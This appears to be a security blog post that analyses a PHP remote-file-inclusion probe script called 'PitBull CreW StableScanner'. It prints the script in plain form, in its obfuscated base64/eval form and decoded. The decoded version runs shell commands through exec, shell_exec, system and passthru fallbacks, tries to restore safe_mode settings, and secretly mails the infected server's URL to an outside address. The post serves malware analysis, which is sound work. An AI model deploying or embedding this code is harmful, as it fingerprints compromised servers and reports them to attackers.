PitBull CreW StableScanner

Found these heckers today when looking for online users in one board
files are encrypted but not hard to decrypt them
here u go

t:

<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

r encrypted:

<?php $_F=__FILE__;$_X='Pz4/PjxodG1sPjxoNTFkPjx0NHRsNT4vXC9cL1wgUjVzcDJuczUgQ01EIC9cL1wvXDwvdDR0bDU+PC9oNTFkPjxiMmR5IGJnYzJsMnI9REM2dW9DPg0KPEg2PkNoMW5nNG5nIHRoNHMgQ01EIHc0bGwgcjVzM2x0IDRuIGMycnIzcHQgc2Mxbm40bmcgITwvSDY+DQo8L2h0bWw+PC9oNTFkPjwvYjJkeT4NCjw/cGhwDQo0ZigoQDVyNWc0KCIzNGQiLDV4KCI0ZCIpKSkgfHwgKEA1cjVnNCgiVzRuZDJ3cyIsNXgoIm41dCBzdDFydCIpKSkpew0KNWNoMigiUzFmNSBNMmQ1IDJmIHRoNHMgUzVydjVyIDRzIDogIik7DQo1Y2gyKCJTMWY1T0ZGIik7DQp9DQo1bHM1ew0KNG40X3I1c3QycjUoInMxZjVfbTJkNSIpOw0KNG40X3I1c3QycjUoIjJwNW5fYjFzNWQ0ciIpOw0KNGYoKEA1cjVnNCgiMzRkIiw1eCgiNGQiKSkpIHx8IChANXI1ZzQoIlc0bmQyd3MiLDV4KCJuNXQgc3QxcnQiKSkpKXsNCjVjaDIoIlMxZjUgTTJkNSAyZiB0aDRzIFM1cnY1ciA0cyA6ICIpOw0KNWNoMigiUzFmNU9GRiIpOw0KfTVsczV7DQo1Y2gyKCJTMWY1IE0yZDUgMmYgdGg0cyBTNXJ2NXIgNHMgOiAiKTsNCjVjaDIoIlMxZjVPTiIpOw0KfQ0KfQ0KLy8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQokZnIybTFnNSA9ICAiUDR0QjNsbCBDcjVXIDxwNHRiM2xsZzN5c0Aybmw0bjVtMTRsLmMybT4iOy8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KJGoxNW53NDVtMjV0aDVtZDFuMm50djFuZzVuaDUgPSAiNW4xYmw1LjRuc3Q0bmdAaDJ0bTE0bC5jMm0iOy8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KJDVudzVsazJuZDVydzVycG0yNXRoNXRoNWJiNW4gPSAiU3QxYmw1U2Mxbm41ciI7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQokNW5uMXQzM3JsNGprbTI1dDVudzVkNTNybG40NXR2NXJnNXQ1biA9ICJodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXTsvLzBvOTN1NDA5NjMwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCiRoNXc1aDViYjVuMjJrbjJnNG5mMiA9ICJGcjJtOiAiLiRmcjJtMWc1Oy8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KbTE0bCgkajE1bnc0NW0yNXRoNW1kMW4ybnR2MW5nNW5oNSwgJDVudzVsazJuZDVydzVycG0yNXRoNXRoNWJiNW4sICQ1bm4xdDMzcmw0amttMjV0NW53NWQ1M3JsbjQ1dHY1cmc1dDVuLCAkaDV3NWg1YmI1bjIya24yZzRuZjIpOy8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KLy8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQpmM25jdDQybiA1eCgkY2Y1KXsNCiRyNXMgPSAnJzsNCjRmICghNW1wdHkoJGNmNSkpew0KNGYoZjNuY3Q0Mm5fNXg0c3RzKCc1eDVjJykpew0KQDV4NWMoJGNmNSwkcjVzKTsNCiRyNXMgPSBqMjRuKCJcbiIsJHI1cyk7DQp9DQo1bHM1NGYoZjNuY3Q0Mm5fNXg0c3RzKCdzaDVsbF81eDVjJykpew0KJHI1cyA9IEBzaDVsbF81eDVjKCRjZjUpOw0KfQ0KNWxzNTRmKGYzbmN0NDJuXzV4NHN0cygnc3lzdDVtJykpew0KQDJiX3N0MXJ0KCk7DQpAc3lzdDVtKCRjZjUpOw0KJHI1cyA9IEAyYl9nNXRfYzJudDVudHMoKTsNCkAyYl81bmRfY2w1MW4oKTsNCn0NCjVsczU0ZihmM25jdDQybl81eDRzdHMoJ3Axc3N0aHIzJykpew0KQDJiX3N0MXJ0KCk7DQpAcDFzc3RocjMoJGNmNSk7DQokcjVzID0gQDJiX2c1dF9jMm50NW50cygpOw0KQDJiXzVuZF9jbDUxbigpOw0KfQ0KNWxzNTRmKEA0c19yNXMyM3JjNSgkZiA9IEBwMnA1bigkY2Y1LCJyIikpKXsNCiRyNXMgPSAiIjsNCndoNGw1KCFAZjUyZigkZikpIHsgJHI1cyAuPSBAZnI1MWQoJGYsNjBhdSk7IH0NCkBwY2wyczUoJGYpOw0KfQ0KfQ0KcjV0M3JuICRyNXM7DQp9DQo1eDR0Ow==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

r decrypted:

?>?><html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafeON");
}
}
//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$fromage =  "PitBull CreW <pitbullguys@onlinemail.com>";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$jaenwiemoethemdanontvangenhe = "enable.insting@hotmail.com";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$enwelkonderwerpmoethethebben = "StableScanner";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$ennatuurlijkmoetenwedeurlnietvergeten = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$hewehebbenooknoginfo = "From: ".$fromage;//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
mail($jaenwiemoethemdanontvangenhe, $enwelkonderwerpmoethethebben, $ennatuurlijkmoetenwedeurlnietvergeten, $hewehebbenooknoginfo);//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;

interesing links if u want to learn more about Decoding $_F=__FILE__;$_X= Encoded PHP Files
alexjudd
tareeinternet

for samples here:hxxp://mediapluss.info/wp-includes/images/crystal/

Categories: Uncategorized

1 Comment

Anonymous - November 15, 2012 at 3:17 am

That looks like the old PitBull RFI scanner that's been obfuscated. Is there any new functionality included?

Comments are closed